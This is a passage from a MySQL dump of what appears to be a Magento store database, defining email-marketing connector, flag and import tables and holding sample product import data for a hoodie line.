  `updated_at` timestamp NULL DEFAULT NULL COMMENT 'Updated at'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Abandoned Carts Table';

-- --------------------------------------------------------

--
-- Table structure for table `email_automation`
--

CREATE TABLE `email_automation` (
  `id` int(10) UNSIGNED NOT NULL COMMENT 'Primary Key',
  `automation_type` varchar(255) DEFAULT NULL COMMENT 'Automation Type',
  `store_name` varchar(255) DEFAULT NULL COMMENT 'Automation Type',
  `enrolment_status` varchar(255) NOT NULL COMMENT 'Enrolment Status',
  `email` varchar(255) DEFAULT NULL COMMENT 'Email',
  `type_id` varchar(255) DEFAULT NULL COMMENT 'Type ID',
  `program_id` varchar(255) DEFAULT NULL COMMENT 'Program ID',
  `website_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Website Id',
  `message` varchar(255) NOT NULL COMMENT 'Message',
  `created_at` timestamp NULL DEFAULT NULL COMMENT 'Creation Time',
  `updated_at` timestamp NULL DEFAULT NULL COMMENT 'Update Time'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Automation Status';

-- --------------------------------------------------------

--
-- Table structure for table `email_campaign`
--

CREATE TABLE `email_campaign` (
  `id` int(10) UNSIGNED NOT NULL COMMENT 'Primary Key',
  `campaign_id` int(10) UNSIGNED NOT NULL COMMENT 'Campaign ID',
  `email` varchar(255) NOT NULL DEFAULT '' COMMENT 'Contact Email',
  `customer_id` int(10) UNSIGNED NOT NULL COMMENT 'Customer ID',
  `sent_at` timestamp NULL DEFAULT NULL COMMENT 'Send Date',
  `order_increment_id` varchar(50) NOT NULL COMMENT 'Order Increment ID',
  `quote_id` int(10) UNSIGNED NOT NULL COMMENT 'Sales Quote ID',
  `message` varchar(255) NOT NULL DEFAULT '' COMMENT 'Error Message',
  `checkout_method` varchar(255) NOT NULL DEFAULT '' COMMENT 'Checkout Method Used',
  `store_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Store ID',
  `event_name` varchar(255) NOT NULL DEFAULT '' COMMENT 'Event Name',
  `send_id` varchar(255) NOT NULL DEFAULT '' COMMENT 'Send Id',
  `send_status` smallint(6) NOT NULL DEFAULT 0 COMMENT 'Campaign send status',
  `created_at` timestamp NULL DEFAULT NULL COMMENT 'Creation Time',
  `updated_at` timestamp NULL DEFAULT NULL COMMENT 'Update Time'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Connector Campaigns';

-- --------------------------------------------------------

--
-- Table structure for table `email_catalog`
--

CREATE TABLE `email_catalog` (
  `id` int(10) UNSIGNED NOT NULL COMMENT 'Primary Key',
  `product_id` int(10) UNSIGNED NOT NULL COMMENT 'Product Id',
  `imported` smallint(5) UNSIGNED DEFAULT NULL COMMENT 'Product imported [deprecated]',
  `modified` smallint(5) UNSIGNED DEFAULT NULL COMMENT 'Product modified [deprecated]',
  `processed` smallint(5) UNSIGNED NOT NULL COMMENT 'Product processed',
  `created_at` timestamp NULL DEFAULT NULL COMMENT 'Creation Time',
  `updated_at` timestamp NULL DEFAULT NULL COMMENT 'Update Time',
  `last_imported_at` timestamp NULL DEFAULT NULL COMMENT 'Last imported date'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Connector Catalog';

--
-- Dumping data for table `email_catalog`
--

INSERT INTO `email_catalog` (`id`, `product_id`, `imported`, `modified`, `processed`, `created_at`, `updated_at`, `last_imported_at`) VALUES
(1804, 1776, NULL, NULL, 0, '2020-08-08 01:43:25', NULL, NULL),
(2034, 2053, NULL, NULL, 0, '2020-08-08 01:43:29', NULL, NULL),
(2049, 2052, NULL, NULL, 0, '2020-08-08 01:43:29', NULL, NULL),
(2050, 2054, NULL, NULL, 0, '2020-08-17 04:13:54', '2020-08-17 04:13:54', NULL),
(2051, 2055, NULL, NULL, 0, '2020-08-17 04:17:21', '2020-08-17 04:17:21', NULL),
(2052, 2057, NULL, NULL, 0, '2020-08-17 04:33:37', '2020-08-17 04:33:37', NULL),
(2053, 2058, NULL, NULL, 0, '2020-08-17 04:41:03', '2020-08-17 04:41:03', NULL),
(2054, 2059, NULL, NULL, 0, '2020-08-17 04:47:44', '2020-08-17 04:47:44', NULL),
(2055, 2060, NULL, NULL, 0, '2020-08-17 05:09:34', '2020-08-17 05:09:34', NULL),
(2056, 2061, NULL, NULL, 0, '2020-08-17 05:49:19', '2020-08-17 05:49:19', NULL),
(2057, 2062, NULL, NULL, 0, '2020-08-17 06:50:40', '2020-08-17 06:50:40', NULL),
(2058, 2063, NULL, NULL, 0, '2020-08-17 07:01:21', '2020-08-17 07:01:21', NULL),
(2059, 2064, NULL, NULL, 0, '2020-08-27 05:53:33', '2020-08-27 05:53:33', NULL);

-- --------------------------------------------------------

--
-- Table structure for table `email_contact`
--

CREATE TABLE `email_contact` (
  `email_contact_id` int(10) UNSIGNED NOT NULL COMMENT 'Primary Key',
  `is_guest` smallint(5) UNSIGNED DEFAULT NULL COMMENT 'Is Guest',
  `contact_id` varchar(15) DEFAULT NULL COMMENT 'Connector Contact ID',
  `customer_id` int(10) UNSIGNED NOT NULL COMMENT 'Customer ID',
  `website_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Website ID',
  `store_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Store ID',
  `email` varchar(255) NOT NULL DEFAULT '' COMMENT 'Customer Email',
  `is_subscriber` smallint(5) UNSIGNED DEFAULT NULL COMMENT 'Is Subscriber',
  `subscriber_status` smallint(5) UNSIGNED DEFAULT NULL COMMENT 'Subscriber status',
  `email_imported` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Is Imported',
  `subscriber_imported` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Is Subscriber Imported',
  `suppressed` smallint(5) UNSIGNED DEFAULT NULL COMMENT 'Is Suppressed',
  `last_subscribed_at` timestamp NULL DEFAULT NULL COMMENT 'Last time user subscribed'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Connector Contacts';

--
-- Dumping data for table `email_contact`
--

INSERT INTO `email_contact` (`email_contact_id`, `is_guest`, `contact_id`, `customer_id`, `website_id`, `store_id`, `email`, `is_subscriber`, `subscriber_status`, `email_imported`, `subscriber_imported`, `suppressed`, `last_subscribed_at`) VALUES
(1, NULL, NULL, 0, 0, 0, '', NULL, NULL, 0, 0, NULL, NULL);

-- --------------------------------------------------------

--
-- Table structure for table `email_contact_consent`
--

CREATE TABLE `email_contact_consent` (
  `id` int(10) UNSIGNED NOT NULL COMMENT 'Primary Key',
  `email_contact_id` int(10) UNSIGNED DEFAULT NULL COMMENT 'Email Contact Id',
  `consent_url` varchar(255) DEFAULT NULL COMMENT 'Contact consent url',
  `consent_datetime` datetime DEFAULT NULL COMMENT 'Contact consent datetime',
  `consent_ip` varchar(255) DEFAULT NULL COMMENT 'Contact consent ip',
  `consent_user_agent` varchar(255) DEFAULT NULL COMMENT 'Contact consent user agent'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Email contact consent table.';

-- --------------------------------------------------------

--
-- Table structure for table `email_coupon_attribute`
--

CREATE TABLE `email_coupon_attribute` (
  `id` int(10) UNSIGNED NOT NULL COMMENT 'Primary Key',
  `salesrule_coupon_id` int(10) UNSIGNED NOT NULL COMMENT 'Coupon ID',
  `email` varchar(255) DEFAULT NULL COMMENT 'Email',
  `expires_at` timestamp NULL DEFAULT NULL COMMENT 'Coupon expiration date'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Dotdigital coupon attributes table';

-- --------------------------------------------------------

--
-- Table structure for table `email_failed_auth`
--

CREATE TABLE `email_failed_auth` (
  `id` int(10) UNSIGNED NOT NULL COMMENT 'Primary Key',
  `failures_num` int(10) UNSIGNED DEFAULT NULL COMMENT 'Number of fails',
  `first_attempt_date` datetime DEFAULT NULL COMMENT 'First attempt date',
  `last_attempt_date` datetime DEFAULT NULL COMMENT 'Last attempt date',
  `url` varchar(255) DEFAULT NULL COMMENT 'URL',
  `store_id` int(10) UNSIGNED DEFAULT NULL COMMENT 'Store Id'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Email Failed Auth Table.';

-- --------------------------------------------------------

--
-- Table structure for table `email_importer`
--

CREATE TABLE `email_importer` (
  `id` int(10) UNSIGNED NOT NULL COMMENT 'Primary Key',
  `import_type` varchar(255) NOT NULL DEFAULT '' COMMENT 'Import Type',
  `website_id` smallint(6) NOT NULL DEFAULT 0 COMMENT 'Website Id',
  `import_status` smallint(6) NOT NULL DEFAULT 0 COMMENT 'Import Status',
  `import_id` varchar(255) NOT NULL DEFAULT '' COMMENT 'Import Id',
  `import_data` mediumblob NOT NULL COMMENT 'Import Data',
  `import_mode` varchar(255) NOT NULL DEFAULT '' COMMENT 'Import Mode',
  `import_file` text NOT NULL COMMENT 'Import File',
  `message` varchar(255) NOT NULL DEFAULT '' COMMENT 'Error Message',
  `created_at` timestamp NULL DEFAULT NULL COMMENT 'Creation Time',
  `updated_at` timestamp NULL DEFAULT NULL COMMENT 'Update Time',
  `import_started` timestamp NULL DEFAULT NULL COMMENT 'Import Started',
  `import_finished` timestamp NULL DEFAULT NULL COMMENT 'Import Finished'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Email Importer';

-- --------------------------------------------------------

--
-- Table structure for table `email_order`
--

CREATE TABLE `email_order` (
  `email_order_id` int(10) UNSIGNED NOT NULL COMMENT 'Primary Key',
  `order_id` int(10) UNSIGNED NOT NULL COMMENT 'Order ID',
  `order_status` varchar(255) NOT NULL COMMENT 'Order Status',
  `quote_id` int(10) UNSIGNED NOT NULL COMMENT 'Sales Quote ID',
  `store_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Store ID',
  `email_imported` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Is Order Imported',
  `modified` smallint(5) UNSIGNED DEFAULT NULL COMMENT 'Is Order Modified',
  `created_at` timestamp NULL DEFAULT NULL COMMENT 'Creation Time',
  `updated_at` timestamp NULL DEFAULT NULL COMMENT 'Update Time'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Transactional Order Data';

-- --------------------------------------------------------

--
-- Table structure for table `email_review`
--

CREATE TABLE `email_review` (
  `id` int(10) UNSIGNED NOT NULL COMMENT 'Primary Key',
  `review_id` int(10) UNSIGNED NOT NULL COMMENT 'Review Id',
  `customer_id` int(10) UNSIGNED NOT NULL COMMENT 'Customer ID',
  `store_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Store Id',
  `review_imported` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Review Imported',
  `created_at` timestamp NULL DEFAULT NULL COMMENT 'Creation Time',
  `updated_at` timestamp NULL DEFAULT NULL COMMENT 'Update Time'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Connector Reviews';

--
-- Dumping data for table `email_review`
--

INSERT INTO `email_review` (`id`, `review_id`, `customer_id`, `store_id`, `review_imported`, `created_at`, `updated_at`) VALUES
(1, 322, 14, 1, 0, '2021-06-08 12:15:30', '2021-06-08 12:15:30');

-- --------------------------------------------------------

--
-- Table structure for table `email_rules`
--

CREATE TABLE `email_rules` (
  `id` int(10) UNSIGNED NOT NULL COMMENT 'Primary Key',
  `name` varchar(255) NOT NULL DEFAULT '' COMMENT 'Rule Name',
  `website_ids` varchar(255) NOT NULL DEFAULT '0' COMMENT 'Website Id',
  `type` smallint(6) NOT NULL DEFAULT 0 COMMENT 'Rule Type',
  `status` smallint(6) NOT NULL DEFAULT 0 COMMENT 'Status',
  `combination` smallint(6) NOT NULL DEFAULT 1 COMMENT 'Rule Condition',
  `conditions` blob NOT NULL COMMENT 'Rule Conditions',
  `created_at` timestamp NULL DEFAULT NULL COMMENT 'Creation Time',
  `updated_at` timestamp NULL DEFAULT NULL COMMENT 'Update Time'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Connector Rules';

-- --------------------------------------------------------

--
-- Table structure for table `email_template`
--

CREATE TABLE `email_template` (
  `template_id` int(10) UNSIGNED NOT NULL COMMENT 'Template ID',
  `template_code` varchar(150) NOT NULL COMMENT 'Template Name',
  `template_text` text NOT NULL COMMENT 'Template Content',
  `template_styles` text DEFAULT NULL COMMENT 'Templste Styles',
  `template_type` int(10) UNSIGNED DEFAULT NULL COMMENT 'Template Type',
  `template_subject` varchar(200) NOT NULL COMMENT 'Template Subject',
  `template_sender_name` varchar(200) DEFAULT NULL COMMENT 'Template Sender Name',
  `template_sender_email` varchar(200) DEFAULT NULL COMMENT 'Template Sender Email',
  `added_at` timestamp NOT NULL DEFAULT current_timestamp() COMMENT 'Date of Template Creation',
  `modified_at` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp() COMMENT 'Date of Template Modification',
  `orig_template_code` varchar(200) DEFAULT NULL COMMENT 'Original Template Code',
  `orig_template_variables` text DEFAULT NULL COMMENT 'Original Template Variables',
  `is_legacy` tinyint(1) NOT NULL DEFAULT 0 COMMENT 'Should the template render in legacy mode'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Email Templates';

-- --------------------------------------------------------

--
-- Table structure for table `email_wishlist`
--

CREATE TABLE `email_wishlist` (
  `id` int(10) UNSIGNED NOT NULL COMMENT 'Primary Key',
  `wishlist_id` int(10) UNSIGNED NOT NULL COMMENT 'Wishlist Id',
  `item_count` int(10) UNSIGNED NOT NULL COMMENT 'Item Count',
  `customer_id` int(10) UNSIGNED DEFAULT NULL COMMENT 'Customer ID',
  `store_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Store Id',
  `wishlist_imported` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Wishlist Imported',
  `wishlist_modified` smallint(5) UNSIGNED DEFAULT NULL COMMENT 'Wishlist Modified',
  `created_at` timestamp NULL DEFAULT NULL COMMENT 'Creation Time',
  `updated_at` timestamp NULL DEFAULT NULL COMMENT 'Update Time'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Connector Wishlist';

-- --------------------------------------------------------

--
-- Table structure for table `flag`
--

CREATE TABLE `flag` (
  `flag_id` int(10) UNSIGNED NOT NULL COMMENT 'Flag Id',
  `flag_code` varchar(255) NOT NULL COMMENT 'Flag Code',
  `state` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Flag State',
  `flag_data` mediumtext DEFAULT NULL COMMENT 'Flag Data',
  `last_update` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp() COMMENT 'Date of Last Flag Update'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Flag';

--
-- Dumping data for table `flag`
--

INSERT INTO `flag` (`flag_id`, `flag_code`, `state`, `flag_data`, `last_update`) VALUES
(1, 'analytics_link_attempts_reverse_counter', 0, '24', '2020-08-02 13:20:29'),
(2, 'report_order_aggregated', 0, NULL, '2021-05-02 12:03:09'),
(3, 'report_tax_aggregated', 0, NULL, '2021-05-02 12:03:09'),
(4, 'report_shipping_aggregated', 0, NULL, '2021-05-02 12:03:10'),
(5, 'report_invoiced_aggregated', 0, NULL, '2021-05-02 12:03:11'),
(6, 'report_refunded_aggregated', 0, NULL, '2021-05-02 12:03:11'),
(7, 'report_coupons_aggregated', 0, NULL, '2021-05-02 12:03:11'),
(8, 'report_bestsellers_aggregated', 0, NULL, '2021-05-02 12:03:12'),
(9, 'report_product_viewed_aggregated', 0, NULL, '2021-05-02 12:03:14');

-- --------------------------------------------------------

--
-- Table structure for table `gift_message`
--

CREATE TABLE `gift_message` (
  `gift_message_id` int(10) UNSIGNED NOT NULL COMMENT 'GiftMessage ID',
  `customer_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Customer ID',
  `sender` varchar(255) DEFAULT NULL COMMENT 'Sender',
  `recipient` varchar(255) DEFAULT NULL COMMENT 'Registrant',
  `message` text DEFAULT NULL COMMENT 'Message'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Gift Message';

-- --------------------------------------------------------

--
-- Table structure for table `googleoptimizer_code`
--

CREATE TABLE `googleoptimizer_code` (
  `code_id` int(10) UNSIGNED NOT NULL COMMENT 'Google experiment code ID',
  `entity_id` int(10) UNSIGNED NOT NULL COMMENT 'Optimized entity ID product ID or catalog ID',
  `entity_type` varchar(50) DEFAULT NULL COMMENT 'Optimized entity type',
  `store_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Store ID',
  `experiment_script` text DEFAULT NULL COMMENT 'Google experiment script'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Google Experiment code';

-- --------------------------------------------------------

--
-- Table structure for table `importexport_importdata`
--

CREATE TABLE `importexport_importdata` (
  `id` int(10) UNSIGNED NOT NULL COMMENT 'ID',
  `entity` varchar(50) NOT NULL COMMENT 'Entity',
  `behavior` varchar(10) NOT NULL DEFAULT 'append' COMMENT 'Behavior',
  `data` longtext DEFAULT NULL COMMENT 'Data'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Import Data Table';

--
-- Dumping data for table `importexport_importdata`
--

INSERT INTO `importexport_importdata` (`id`, `entity`, `behavior`, `data`) VALUES
(1, 'catalog_product', 'append', '[{\"sku\":\"MH01-XS-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Chaz Kangeroo Hoodie-XS-Black\",\"description\":\"<p>Ideal for cold-weather training or work outdoors, the Chaz Hoodie promises superior warmth with every wear. Thick material blocks out the wind as ribbed cuffs and bottom band seal in body heat.<\\/p>\\n<p>&bull; Two-tone gray heather hoodie.<br \\/>&bull; Drawstring-adjustable hood. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"52\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"chaz-kangeroo-hoodie-xs-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh01-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh01-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh01-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh01-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh01-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Black\"},{\"sku\":\"MH01-XS-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Chaz Kangeroo Hoodie-XS-Gray\",\"description\":\"<p>Ideal for cold-weather training or work outdoors, the Chaz Hoodie promises superior warmth with every wear. Thick material blocks out the wind as ribbed cuffs and bottom band seal in body heat.<\\/p>\\n<p>&bull; Two-tone gray heather hoodie.<br \\/>&bull; Drawstring-adjustable hood. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"52\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"chaz-kangeroo-hoodie-xs-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh01-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh01-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh01-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/h\\/mh01-gray_alt1.jpg,\\/m\\/h\\/mh01-gray_back.jpg\",\"image\":\"\\/m\\/h\\/mh01-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh01-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/h\\/mh01-gray_alt1.jpg,\\/m\\/h\\/mh01-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Gray\"},{\"sku\":\"MH01-XS-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Chaz Kangeroo Hoodie-XS-Orange\",\"description\":\"<p>Ideal for cold-weather training or work outdoors, the Chaz Hoodie promises superior warmth with every wear. Thick material blocks out the wind as ribbed cuffs and bottom band seal in body heat.<\\/p>\\n<p>&bull; Two-tone gray heather hoodie.<br \\/>&bull; Drawstring-adjustable hood. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"52\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"chaz-kangeroo-hoodie-xs-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh01-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh01-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh01-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh01-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh01-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Orange\"},{\"sku\":\"MH01-S-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Chaz Kangeroo Hoodie-S-Black\",\"description\":\"<p>Ideal for cold-weather training or work outdoors, the Chaz Hoodie promises superior warmth with every wear. Thick material blocks out the wind as ribbed cuffs and bottom band seal in body heat.<\\/p>\\n<p>&bull; Two-tone gray heather hoodie.<br \\/>&bull; Drawstring-adjustable hood. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"52\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"chaz-kangeroo-hoodie-s-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh01-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh01-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh01-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_